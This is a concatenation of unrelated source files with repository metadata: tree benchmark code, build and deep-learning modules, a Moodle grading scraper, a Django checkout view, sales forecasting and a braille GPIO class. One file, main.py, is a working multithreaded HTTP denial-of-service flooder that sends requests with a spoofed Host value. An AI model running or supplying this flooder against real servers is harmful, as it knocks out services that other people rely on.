size4:int = 0
size5:int = 0
def insert(self:"Tree5", x:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert2(self:"Tree5", x:int, x2:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert3(self:"Tree5", x:int, x2:int, x3:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def insert5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> object:
if self.root is None:
self.root = makeNode5(x, x, x, x, x)
self.size = 1
else:
if self.root.insert(x):
self.size = self.size + 1
def contains(self:"Tree5", x:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains2(self:"Tree5", x:int, x2:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains3(self:"Tree5", x:int, x2:int, x3:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains4(self:"Tree5", x:int, x2:int, x3:int, x4:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def contains5(self:"Tree5", x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
if self.root is None:
return False
else:
return self.root.contains(x)
def makeNode(x: int) -> TreeNode:
b:TreeNode = None
b = TreeNode()
b.value = x
return b
def makeNode2(x: int, x2: int) -> TreeNode2:
b:TreeNode2 = None
b2:TreeNode2 = None
b = TreeNode2()
b.value = x
return b
def makeNode3(x: int, x2: int, x3: int) -> TreeNode3:
b:TreeNode3 = None
b2:TreeNode3 = None
b3:TreeNode3 = None
b = TreeNode3()
b.value = x
return b
def makeNode4(x: int, x2: int, x3: int, x4: int) -> TreeNode4:
b:TreeNode4 = None
b2:TreeNode4 = None
b3:TreeNode4 = None
b4:TreeNode4 = None
b = TreeNode4()
b.value = x
return b
def makeNode5(x: int, x2: int, x3: int, x4: int, x5: int) -> TreeNode5:
b:TreeNode5 = None
b2:TreeNode5 = None
b3:TreeNode5 = None
b4:TreeNode5 = None
b5:TreeNode5 = None
b = TreeNode5()
b.value = x
return b
# Input parameters
n:int = 100
n2:int = 100
n3:int = 100
n4:int = 100
n5:int = 100
c:int = 4
c2:int = 4
c3:int = 4
c4:int = 4
c5:int = 4
# Data
t:Tree = None
t2:Tree = None
t3:Tree = None
t4:Tree = None
t5:Tree = None
i:int = 0
i2:int = 0
i3:int = 0
i4:int = 0
i5:int = 0
k:int = 37813
k2:int = 37813
k3:int = 37813
k4:int = 37813
k5:int = 37813
# Crunch
t = Tree()
while i < n:
t.insert(k)
k = (k * 37813) % 37831
if i % c != 0:
t.insert(i)
i = i + 1
print(t.size)
for i in [4, 8, 15, 16, 23, 42]:
if t.contains(i):
print(i)
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
089fa62ac91f6bcb54a71d72d585c63e4ec9ea6f
|
0c4c05487cc51269527e7be876257a7bc90af2c9
|
/setup.py
|
4c9deb5e69d54a4f65299810e9cecd4268406a81
|
[] |
no_license
|
brightendavid/image_test
|
87f214c026909d797f7b43b75b9b8762d5108480
|
8fee89276a2b39fc9abe29a565c44d88e6e9b79f
|
refs/heads/master
| 2021-09-02T05:23:10.608047
| 2017-12-30T19:02:48
| 2017-12-30T19:02:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
name = 'ela',
version = '1.0',
author = 'Shreyash Sharma',
# The ext modules interface the cpp code with the python one:
ext_modules=[
Extension("ela",
sources=["elawrapper.pyx", "ela.cpp"], # Note, you can link against a c++ library instead of including the source
include_dirs=[".","source" , "/usr/local/include/opencv", "/usr/local/include"],
language="c++",
library_dirs=['/usr/local/lib', 'source', '/usr/lib', '/lib'],
libraries=['opencv_core', 'opencv_highgui'])
],
cmdclass = {'build_ext': build_ext},
)
|
[
"shreyneil@yahoo.co.in"
] |
shreyneil@yahoo.co.in
|
f446b6c8b2833b421592915d637db99761f2c596
|
18aee5d93a63eab684fe69e3aa0abd1372dd5d08
|
/python/paddle/nn/layer/distance.py
|
e2fb10f252f1008f0ddc5e41e1e48afbedb8d67c
|
[
"Apache-2.0"
] |
permissive
|
Shixiaowei02/Paddle
|
8d049f4f29e281de2fb1ffcd143997c88078eadb
|
3d4d995f26c48f7792b325806ec3d110fc59f6fc
|
refs/heads/develop
| 2023-06-26T06:25:48.074273
| 2023-06-14T06:40:21
| 2023-06-14T06:40:21
| 174,320,213
| 2
| 1
|
Apache-2.0
| 2022-12-28T05:14:30
| 2019-03-07T10:09:34
|
C++
|
UTF-8
|
Python
| false
| false
| 3,333
|
py
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .. import functional as F
from .layers import Layer
__all__ = []
class PairwiseDistance(Layer):
r"""
It computes the pairwise distance between two vectors. The
distance is calculated by p-oreder norm:
.. math::
\Vert x \Vert _p = \left( \sum_{i=1}^n \vert x_i \vert ^ p \right) ^ {1/p}.
Parameters:
p (float, optional): The order of norm. Default: :math:`2.0`.
epsilon (float, optional): Add small value to avoid division by zero.
Default: :math:`1e-6`.
keepdim (bool, optional): Whether to reserve the reduced dimension
in the output Tensor. The result tensor is one dimension less than
the result of ``|x-y|`` unless :attr:`keepdim` is True. Default: False.
name (str, optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Shape:
- x: :math:`[N, D]` or :math:`[D]`, where :math:`N` is batch size, :math:`D`
is the dimension of the data. Available data type is float16, float32, float64.
- y: :math:`[N, D]` or :math:`[D]`, y have the same dtype as x.
- output: The same dtype as input tensor.
- If :attr:`keepdim` is True, the output shape is :math:`[N, 1]` or :math:`[1]`,
depending on whether the input has data shaped as :math:`[N, D]`.
- If :attr:`keepdim` is False, the output shape is :math:`[N]` or :math:`[]`,
depending on whether the input has data shaped as :math:`[N, D]`.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1., 3.], [3., 5.]], dtype=paddle.float64)
y = paddle.to_tensor([[5., 6.], [7., 8.]], dtype=paddle.float64)
dist = paddle.nn.PairwiseDistance()
distance = dist(x, y)
print(distance)
# Tensor(shape=[2], dtype=float64, place=Place(gpu:0), stop_gradient=True,
# [4.99999860, 4.99999860])
"""
def __init__(self, p=2.0, epsilon=1e-6, keepdim=False, name=None):
super().__init__()
self.p = p
self.epsilon = epsilon
self.keepdim = keepdim
self.name = name
def forward(self, x, y):
return F.pairwise_distance(
x, y, self.p, self.epsilon, self.keepdim, self.name
)
def extra_repr(self):
main_str = 'p={p}'
if self.epsilon != 1e-6:
main_str += ', epsilon={epsilon}'
if self.keepdim is not False:
main_str += ', keepdim={keepdim}'
if self.name is not None:
main_str += ', name={name}'
return main_str.format(**self.__dict__)
|
[
"noreply@github.com"
] |
noreply@github.com
|
094e3921b57c77c4982b0f0a93f74df051c9f37b
|
ae2ad8f6361a79f332a79ff5a130eceb71a8be82
|
/main.py
|
113defaef88a49fe87ab609a293be7209114ddc7
|
[] |
no_license
|
guipuglia/MoodleEpsReview
|
a419a8874bd7d007463d5243e67896146b60349f
|
9e6a47093fd86817ebe5901edd1a37512bd77d2e
|
refs/heads/master
| 2021-01-10T18:26:38.756145
| 2011-11-11T16:49:51
| 2011-11-11T16:49:51
| 1,973,361
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,266
|
py
|
# -*- coding: utf-8 -*-
import Login
import Parser
import Student
def defineGrades(login):
p = Parser.Parser(login.open('http://paca.ime.usp.br/grade/report/grader/index.php?id=491&perpage=100&page=0&sortitemid=firstname'))
table = p.clean('table','id', 'user-grades')
listSt = p.getStudentsGrades(table)
pp = Parser.Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12535&tsort=firstname'))
table = pp.clean('table','class', 'flexible submissions')
print table
sst = pp.getStudents(table)
for s in sst:
for e in listSt:
if s.name == e[0]:
# print s
# print e[1]
# print '-------'
comments = ''
grades = e[1]
final = 0
if len(grades) < 2:
final = 0
comments = 'Entregou menos que 2 eps.'
                elif len(grades) == 2:
final = 20
comments = 'Entregou 2 eps. (REPROVADO)'
elif len(grades) == 3:
final = 30
comments = 'Entregou 3 eps. (RECUPERAÇÃO)'
else:
grades.sort()
if len(grades) == 5:
del grades[0]
for g in grades:
final += float(g)/4
ans = int(final)
if final - float(ans) >= 0.5:
ans += 1
# print str(final) + ' ' + str(ans)
s.reviewEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php', ans, comments)
                print 'published'
break
def correctionOfEpMode(login):
#p = Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12397'))
p = Parser.Parser(login.open('http://paca.ime.usp.br/mod/assignment/submissions.php?id=12435&tsort=firstname'))
table = p.clean('table','class', 'flexible submissions')
st = p.getStudents(table)
for s in st:
if s.fileLink == '':
s.reviewNaoEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php')
            print str(s) + '\nNot submitted'
else:
print s
print "Criando diretório:"
# s.createDir('/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/')
# print "Baixando arquivo:"
# s.downloadFile(login, '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/')
# s.copyFile( '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/template.txt',
# '/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/', 'comentario.txt')
print "Parser Nota:"
nota, comments = p.getResults('/home/gui/Dropbox/Mestrado/2011/mac323/EPSub/Eps/' + s.name.replace(' ', '_') + '/comentario.txt')
print str(nota) + ' / 100'
print "Review"
s.reviewEntregou(login, 'http://paca.ime.usp.br/mod/assignment/submissions.php', nota, comments.replace('\n', '<p>\n'))
print '---------------'
if __name__ == '__main__':
# login = Login.Login('7259186', raw_input('Senha: '))
login = Login.Login('7259186', '')
login.connect('username', 'password')
# correctionOfEpMode(login)
defineGrades(login)
|
[
"guiipuglia@gamil.com"
] |
guiipuglia@gamil.com
|
caa4c2efe44602245bbd886dd1a4469c34199a3b
|
0a67e192610eb82779131314de3302452bf542cc
|
/checkout/views.py
|
85bbe441b11f0789565468ffa84983135a8fa1cb
|
[] |
no_license
|
Code-Institute-Submissions/SaraSanchezz-4MilestoneProject_OctResub
|
ad6894f486b6b5cfd652c05fcc056257b960f35e
|
4f9d2b0ec22a4502096199623c43683648a219ba
|
refs/heads/master
| 2023-08-22T00:32:08.503641
| 2021-10-24T11:05:22
| 2021-10-24T11:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,898
|
py
|
from django.shortcuts import (
render, redirect, reverse, get_object_or_404, HttpResponse)
from django.views.decorators.http import require_POST
from django.contrib import messages
from django.conf import settings
from .forms import OrderForm
from .models import Order, OrderLineItem
from products.models import Product
from bag.contexts import bag_contents
from profiles.models import UserProfile
from profiles.forms import UserProfileForm
import stripe
import json
# Create your views here.
@require_POST
def cache_checkout_data(request):
try:
pid = request.POST.get('client_secret').split('_secret')[0]
stripe.api_key = settings.STRIPE_SECRET_KEY
stripe.PaymentIntent.modify(pid, metadata={
'bag': json.dumps(request.session.get('bag', {})),
'save_info': request.POST.get('save_info'),
'username': request.user,
})
return HttpResponse(status=200)
except Exception as e:
messages.error(request, 'Sorry your payment cannot be\
processed now')
return HttpResponse(content=e, status=400)
def checkout(request):
stripe_public_key = settings.STRIPE_PUBLIC_KEY
stripe_secret_key = settings.STRIPE_SECRET_KEY
if request.method == 'POST':
bag = request.session.get('bag', {})
form_data = {
'full_name': request.POST['full_name'],
'email': request.POST['email'],
'phone_number': request.POST['phone_number'],
'country': request.POST['country'],
'postcode': request.POST['postcode'],
'town_or_city': request.POST['town_or_city'],
'street_address1': request.POST['street_address1'],
'street_address2': request.POST['street_address2'],
'county': request.POST['county'],
}
order_form = OrderForm(form_data)
if order_form.is_valid():
order = order_form.save(commit=False)
pid = request.POST.get('client_secret').split('_secret')[0]
order.stripe_pid = pid
order.original_bag = json.dumps(bag)
order.save()
for item_id, item_data in bag.items():
try:
product = Product.objects.get(id=item_id)
if isinstance(item_data, int):
order_line_item = OrderLineItem(
order=order,
product=product,
quantity=item_data,
)
order_line_item.save()
else:
for size, quantity in item_data['items_by_size'].items():
order_line_item = OrderLineItem(
order=order,
product=product,
quantity=quantity,
product_size=size,
)
order_line_item.save()
except Product.DoesNotExist:
messages.error(request, (
"One of the products in your bag wasn't "
"found in our database. "
"Please call us for assistance!")
)
order.delete()
return redirect(reverse('view_bag'))
request.session['save_info'] = 'save-info' in request.POST
return redirect(reverse('checkout_success', args=[order.order_number]))
else:
messages.error(request, 'There was an error.\
Please check your details')
else:
bag = request.session.get('bag', {})
if not bag:
messages.error(request, "Your bag is empty")
return redirect(reverse('products'))
current_bag = bag_contents(request)
total = current_bag['grand_total']
stripe_total = round(total * 100)
stripe.api_key = stripe_secret_key
intent = stripe.PaymentIntent.create(
amount=stripe_total,
currency=settings.STRIPE_CURRENCY,
)
# prefill the form with any info the user maintains in their profile
if request.user.is_authenticated:
try:
profile = UserProfile.objects.get(user=request.user)
order_form = OrderForm(initial={
'full_name': profile.user.get_full_name(),
'email': profile.user.email,
'phone_number': profile.default_phone_number,
'country': profile.default_country,
'postcode': profile.default_postcode,
'town_or_city': profile.default_town_or_city,
'street_address1': profile.default_street_address1,
'street_address2': profile.default_street_address2,
'county': profile.default_county,
})
except UserProfile.DoesNotExist:
order_form = OrderForm()
else:
order_form = OrderForm()
if not stripe_public_key:
messages.warning(request, 'stripe public key is missing')
template = 'checkout/checkout.html'
context = {
'order_form': order_form,
'stripe_public_key': stripe_public_key,
'client_secret': intent.client_secret,
}
return render(request, template, context)
def checkout_success(request, order_number):
save_info = request.session.get('save_info')
order = get_object_or_404(Order, order_number=order_number)
if request.user.is_authenticated:
profile = UserProfile.objects.get(user=request.user)
# Attach the user's profile to the order
order.user_profile = profile
order.save()
# Save the user's info
if save_info:
profile_data = {
'default_phone_number': order.phone_number,
'default_country': order.country,
'default_postcode': order.postcode,
'default_town_or_city': order.town_or_city,
'default_street_address1': order.street_address1,
'default_street_address2': order.street_address2,
'default_county': order.county,
}
user_profile_form = UserProfileForm(profile_data, instance=profile)
if user_profile_form.is_valid():
user_profile_form.save()
messages.success(request, f'Order successfully processed! \
Your order number is {order_number}. A confirmation \
email will be sent to {order.email}.')
if 'bag' in request.session:
del request.session['bag']
template = 'checkout/checkout_success.html'
context = {
'order': order,
}
return render(request, template, context)
|
[
"sarasanrodrigo@gmail.com"
] |
sarasanrodrigo@gmail.com
|
50ddef3e12604adbe00d3db3058a99758b1c10a0
|
e02af62b3d0b8737a728b8169b91c37b7b99d0ab
|
/main.py
|
43fc35413573f68d256ac16ab919537e9c42fe30
|
[] |
no_license
|
z9fr/DOS-Attack-Script
|
debaa6f7e7d04caaa658407d16208e4da2c32927
|
098920523bf5c152a86e1e32a8298f908f7f24fe
|
refs/heads/main
| 2023-03-22T01:45:19.137301
| 2021-03-22T18:51:46
| 2021-03-22T18:51:46
| 313,788,301
| 11
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,604
|
py
|
import socket
import threading
#target_ip = '195.20.52.179'
#fake_ip = '182.21.20.32'
#port = 80
print("\n\n")
print(" +-------------------------------------+")
print(" | nov, 18th, 2020 |")
print(" | This is a simple DOS attack script |")
print(" | Github: https://github.com/d4az |")
print(" | Author: Dasith Vidanage |")
print(" | Version: 0.1 |")
print(" +---------------------------d4az------+ ")
print("\n\n")
print("Enter ip Address of The Target ")
print("To Get the ip adress You can ping the domain in the terminal. eg #target = '120.00.00.000'")
target = input("\t == > ")
print("Enter The Fake Ip Address that you wants to spoof. eg: #fake_ip = '120.00.00.01' ")
fake_ip = input("\t\t ==> ")
print("Enter The Port Number You Want to Attack ? ")
port = input("\t\t ==> ")
port = int(port)
attack_num = 0
print("Sending Packets...")
def attack():
while True:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
global attack_num
attack_num += 1
packesnum =attack_num
packesnum= str(packesnum)
print("Packets Sending => "+packesnum)
print("Done")
s.close()
print("Packets Send Sucess!")
for i in range(500):
thread = threading.Thread(target=attack)
thread.start()
|
[
"noreply@github.com"
] |
noreply@github.com
|
cc7d477682c93f80dadceaf8917cd2381faf4d91
|
3cbf2c8d87e7cd187a94059ae985289319661343
|
/starschema.py
|
dd0a62a95fd8359b1c84e40502db1e3ef8e7abcd
|
[] |
no_license
|
SkNuwanTissera/Wtrainer
|
a8c6173ea18818826df118f2204f2187cfda4cd5
|
36dc5a669c8a617ebf8425dc51b388f954dcbd2c
|
refs/heads/master
| 2022-11-26T21:33:46.119592
| 2020-08-01T05:35:49
| 2020-08-01T05:35:49
| 283,975,245
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,230
|
py
|
#######################################################################
# READ THIS BEFORE EXECUTION
#######################################################################
# This script will delete the current db file and create a new db file
# with all new data in JSON. This has a limitation when it comes to
# adding more data that needs to be appended to the database.
########################################################################
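# A possible append-mode alternative (an untested sketch, not part of this
# script): keep star.db and add only new rows. `new_rows` below is a
# hypothetical list of mapped objects built from the fresh JSON.
#
#     engine = create_engine('sqlite:///star.db')
#     Base.metadata.create_all(engine)  # no-op for tables that already exist
#     session = sessionmaker(bind=engine)()
#     session.add_all(new_rows)
#     session.commit()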
import json
import os
from datetime import datetime
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from sqlalchemy.sql import *
# Removing current DB file
os.remove("star.db")
print("\nCurrent DB File Removed!")
engine = create_engine('sqlite:///star.db')
Base = declarative_base()
# read file
print('\nReading JSON ...')
with open('course_data.json', 'r') as myfile:
data = myfile.read()
# parse file
obj = json.loads(data)
# Defining the schemas
# Course Dimension
class Course(Base):
__tablename__ = "course_dimension"
Id = Column(Integer, primary_key=True)
CourseId = Column(String)
CourseTitle = Column(String)
IsPaid = Column(Boolean)
Price = Column(Float)
NumOfSubscribers = Column(Integer)
NumOfReviews = Column(Integer)
NumOfLectures = Column(Integer)
Level = Column(String)
ContentDuration = Column(Float)
PublishedTimestamp = Column(DateTime)
Subject = Column(String)
# Author Dimension
class Author(Base):
__tablename__ = "author_dimension"
AuthorId = Column(Integer, primary_key=True)
Author = Column(String)
FirstName = Column(String)
LastName = Column(String)
AuthorCode = Column(String)
# Date Dimension
class Date(Base):
__tablename__ = "date_dimension"
DateId = Column(Integer, primary_key=True)
Month = Column(Integer)
Year = Column(Integer)
Timestamp = Column(TIMESTAMP)
# Fact Table
# Sales Fact Table
class Sales(Base):
__tablename__ = "sales_fact"
SalesId = Column(Integer, primary_key=true)
CourseId = Column(Integer)
AuthorId = Column(Integer)
DateId = Column(Integer)
NumOfSubscribers = Column(Integer)
Price = Column(Float)
# Drop current tables
# Course.__table__.drop(engine)
# Author.__table__.drop(engine)
# Date.__table__.drop(engine)
# Sales.__table__.drop(engine)
# Create new tables
print('Creating new tables ...')
Course.__table__.create(bind=engine, checkfirst=true)
Author.__table__.create(bind=engine, checkfirst=true)
Date.__table__.create(bind=engine, checkfirst=true)
Sales.__table__.create(bind=engine, checkfirst=true)
# Data transformation
print('Data Transformation on Process ...')
sales_fact, date_dimension, author_dimension, course_dimension = [], [], [], []
for i, result in enumerate(obj['course_id']):
course_row = {}
author_row = {}
date_row = {}
sales_row = {}
course_row['Id'] = i + 1
course_row['CourseId'] = str(obj['course_id'][str(i)])
course_row['CourseTitle'] = str(obj['course_title'][str(i)])
course_row['IsPaid'] = bool(obj['is_paid'][str(i)])
course_row['Price'] = float(obj['price'][str(i)])
course_row['NumOfSubscribers'] = int(obj['num_subscribers'][str(i)])
course_row['NumOfReviews'] = int(obj['num_reviews'][str(i)])
course_row['NumOfLectures'] = int(obj['num_lectures'][str(i)])
course_row['Level'] = str(obj['level'][str(i)])
course_row['ContentDuration'] = float(obj['content_duration'][str(i)])
date = datetime.strptime(obj['published_timestamp'][str(i)], '%Y-%m-%dT%H:%M:%SZ')
course_row['PublishedTimestamp'] = date.date()
course_row['Subject'] = str(obj['subject'][str(i)])
sales_row['SalesId'] = i + 1
sales_row['CourseId'] = str(obj['course_id'][str(i)])
sales_row['AuthorId'] = str(obj['author'][str(i)])
sales_row['DateId'] = i + 1
sales_row['NumOfSubscribers'] = int(obj['num_subscribers'][str(i)])
sales_row['Price'] = float(obj['price'][str(i)])
date_row['DateId'] = i + 1
month = str(date).split(' ')[0].split('-')[1]
year = str(date).split(' ')[0].split('-')[0]
date_row['Month'] = str(month)
date_row['Year'] = str(year)
date_row['Timestamp'] = date.date()
author_row['AuthorId'] = i + 1
author_row['Author'] = str(obj['author'][str(i)])
author_row['FirstName'] = str(obj['author'][str(i)]).split('_')[0]
author_row['LastName'] = str(obj['author'][str(i)]).split('_')[1] # split
author_row['AuthorCode'] = str(obj['author'][str(i)]).split('_')[2] # split
course_dimension.append(course_row)
sales_fact.append(sales_row)
date_dimension.append(date_row)
author_dimension.append(author_row)
# Load to database - seeding
print('Loading data to database ...')
Session = sessionmaker(bind=engine)
session = Session()
for course in course_dimension:
row = Course(**course)
session.add(row)
for dateData in date_dimension:
row = Date(**dateData)
session.add(row)
for authorData in author_dimension:
row = Author(**authorData)
session.add(row)
for salesData in sales_fact:
row = Sales(**salesData)
session.add(row)
session.commit()
print("\nSuccessfully Completed The Process !!")
|
[
"nuwan.tissera@my.sliit.lk"
] |
nuwan.tissera@my.sliit.lk
|
951368bbcf5ba887bbf79ec62af53c593f6f56e3
|
4ba1d93c5930afca3c5831504f02403999df1d9c
|
/Forecasting_cococola.py
|
955a8bcb152f483b33b183188453502b9de1b00e
|
[] |
no_license
|
Isiribn/Forecasting
|
39273142f93cc657e1e77ac05180c55b4b1287db
|
ddb8065aa2a677e5ac42a7a7248ec953843341ba
|
refs/heads/main
| 2023-04-01T05:57:44.900968
| 2021-04-09T11:28:58
| 2021-04-09T11:28:58
| 356,242,339
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,661
|
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
data=pd.read_excel('CocaCola_Sales_Rawdata.xlsx')
data.head()
# In[2]:
data.shape
# In[3]:
data.isnull().any()
# In[4]:
data.duplicated().any()
# In[5]:
data.info()
# In[6]:
data.describe()
# In[7]:
data.hist()
# In[10]:
import matplotlib.pyplot as plt
data.Sales.plot(label="org")
for i in range(2, 10, 2):
data["Sales"].rolling(i).mean().plot(label=str(i))
plt.legend(loc=3)
# In[11]:
data.plot(kind='kde')
# In[12]:
import statsmodels.api as sm
from statsmodels.tsa.seasonal import seasonal_decompose
from statsmodels.tsa.holtwinters import SimpleExpSmoothing # SES
from statsmodels.tsa.holtwinters import Holt # Holts Exponential Smoothing
from statsmodels.tsa.holtwinters import ExponentialSmoothing
import statsmodels.graphics.tsaplots as tsa_plots
import statsmodels.tsa.statespace as tm_models
#from datetime import datetime,time
# In[13]:
tsa_plots.plot_acf(data.Sales,lags=10)
tsa_plots.plot_pacf(data.Sales)
# In[14]:
train=data.head(48)
test=data.tail(12)
# In[15]:
import numpy as np
def MAPE(pred,org):
temp=np.abs((pred-org))*100/org
return np.mean(temp)
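# Quick sanity check for MAPE (illustrative numbers, not from the dataset):
# pred = np.array([110.0, 90.0]) and org = np.array([100.0, 100.0]) give
# per-point errors of 10% each, so MAPE(pred, org) == 10.0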
# In[16]:
#Simple Exponential Smoothing
ses_model=SimpleExpSmoothing(train["Sales"]).fit()
pred_ses=ses_model.predict(start=test.index[0],end=test.index[-1])
MAPE(pred_ses,test.Sales)
# In[17]:
#Holt Exponential smoothing
hw_model=Holt(train["Sales"]).fit()
pred_hw=hw_model.predict(start=test.index[0], end=test.index[-1])
MAPE(pred_hw,test.Sales)
# In[18]:
hwe_model_add_add = ExponentialSmoothing(train["Sales"],seasonal="add",trend="add",seasonal_periods=4,damped=True).fit()
pred_hwe_add_add = hwe_model_add_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_add_add,test.Sales)
# In[19]:
hwe_model_mul_add = ExponentialSmoothing(train["Sales"],seasonal="mul",trend="add",seasonal_periods=4).fit()
pred_hwe_mul_add = hwe_model_mul_add.predict(start = test.index[0],end = test.index[-1])
MAPE(pred_hwe_mul_add,test.Sales)
# In[20]:
plt.plot(train.index, train["Sales"], label='Train',color="r")
# In[21]:
plt.plot(test.index, test["Sales"], label='Test',color="blue")
# In[22]:
plt.plot(pred_ses.index, pred_ses, label='SimpleExponential',color="green")
plt.plot(pred_hw.index, pred_hw, label='Holts_winter',color="red")
# In[23]:
plt.plot(pred_hwe_add_add.index,pred_hwe_add_add,label="HoltsWinterExponential_1",color="brown")
plt.plot(pred_hwe_mul_add.index,pred_hwe_mul_add,label="HoltsWinterExponential_2",color="yellow")
plt.legend(loc='best')
# In[ ]:
# In[ ]:
# In[ ]:
|
[
"noreply@github.com"
] |
noreply@github.com
|
563546f5b953d8a2b7b512856a99df5b88aef108
|
bc23a3734e3ae3be64c6e5a1ae94204552d1a554
|
/Arrays and Strings/06_findAinBOfString.py
|
7556ff9313cf7b568601a6be3437ae664db28a80
|
[] |
no_license
|
mmrraju/Coding-interview-preparation
|
c3c2fc91c5ccbb383f4672af4ea77f169281529c
|
738949fe7bc6e50d4bd55ac0b2b47c002ca0f464
|
refs/heads/main
| 2023-08-29T16:06:46.990849
| 2021-10-20T07:15:46
| 2021-10-20T07:15:46
| 408,050,819
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
""" Given two stings ransomNote and magazine, return true if ransomNote can be constructed from magazine and false otherwise.
Each letter in magazine can only be used once in ransomNote """
magazine = input()
ransomNote = input()
def isMagazineInRansomNote(magazine, ransomNote):
d = {}
for ch in magazine:
if ch not in d:
d[ch] = 1
else:
d[ch] += 1
for ch in ransomNote:
if ch not in d:
return False
        else:  # if char is present, check the count and reduce it
            if d[ch] > 1:
                d[ch] -= 1
            else:  # once the count reaches 1, remove the char so it cannot be reused
                del d[ch]
return True
print(isMagazineInRansomNote(magazine, ransomNote))
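# An equivalent, shorter formulation (a sketch, not part of the original
# solution): subtracting Counters keeps only the characters that magazine
# cannot cover, so an empty result means the note is constructible.
#
# from collections import Counter
# def is_constructible(ransom_note, magazine):
#     return not (Counter(ransom_note) - Counter(magazine))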
|
[
"noreply@github.com"
] |
noreply@github.com
|
46733eaf24c7a1380cffa1e8c03d6f2273e2c0eb
|
5a6e6741fe7c64cb99b6fbff66ab332d3563ffa9
|
/src/interaction/dot.py
|
3e15b615f1a9f926b58d39b9c4882b45fb67e862
|
[] |
no_license
|
gowhale/braille-pi
|
06c9fdf05f0bc5a8ae3f2c18cb74e2c487e103dc
|
d184e7cc2f4cc6f339186a85057922706fc69a8a
|
refs/heads/dev
| 2023-07-18T05:27:21.156461
| 2021-08-27T14:01:08
| 2021-08-27T14:01:08
| 320,604,946
| 0
| 0
| null | 2021-08-16T12:52:21
| 2020-12-11T15:02:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
import RPi.GPIO as GPIO
from random import randrange
class Dot ():
"""This class links the hardware's dots to the code's dots.
Attributes:
gpio_pin (Int) Value of the GPIO pin each dot is connected to.
braille_dot (Int) Which dot out of 6 this object represents.
value (Boolean) Whether the dot is active or not."""
gpio_pin = 0
braille_dot = 0
value = False
def __init__(self, dot, gpio_pin):
"""Initialises the Dot class.
Parameters:
        dot (Int) Which dot out of 6 this object represents.
        gpio_pin (Int) Value of the GPIO pin this dot is connected to."""
self.braille_dot = dot
self.gpio_pin = gpio_pin
GPIO.setup(gpio_pin, GPIO.OUT)
GPIO.output(gpio_pin, GPIO.LOW)
self.update_value()
def get_value(self):
"""Gets the value of the physcical button. i.e. high or low"""
return self.value
def update_value(self):
"""Updates the Dot's registered value."""
current_val = GPIO.input(self.gpio_pin)
if current_val:
self.value = 0
else:
self.value = 1
def get_current_value(self):
"""Updates the Dot's value and then returns it."""
self.update_value()
return self.get_value()
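# Minimal usage sketch (assumes the caller has configured the pin numbering
# mode; pin 17 and dot 1 are illustrative choices, not values from this repo):
#
# GPIO.setmode(GPIO.BCM)
# dot1 = Dot(dot=1, gpio_pin=17)
# print(dot1.get_current_value())  # 1 while the input reads low, else 0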
|
[
"gabewhale@gmail.com"
] |
gabewhale@gmail.com
|
d7c0287fb7a3ef5af824015f71ad03d55a1bcc74
|
83714c643612926730641c95a2a656a3ac1a38be
|
/dsp_hw4/demo8_exe6/echo_input_output.py
|
f5e27f1ecff0794466479f7c4f070d315d5e9f1e
|
[] |
no_license
|
maying0120/Dsp-Lab-NYU6183
|
122a71f0ec63acf844861ea1b398045998d5bf8f
|
0a6cdf5ea899caaab50e8b69b73d2755112b045c
|
refs/heads/master
| 2023-01-14T11:37:24.525234
| 2020-11-22T06:00:41
| 2020-11-22T06:00:41
| 314,956,844
| 1
| 1
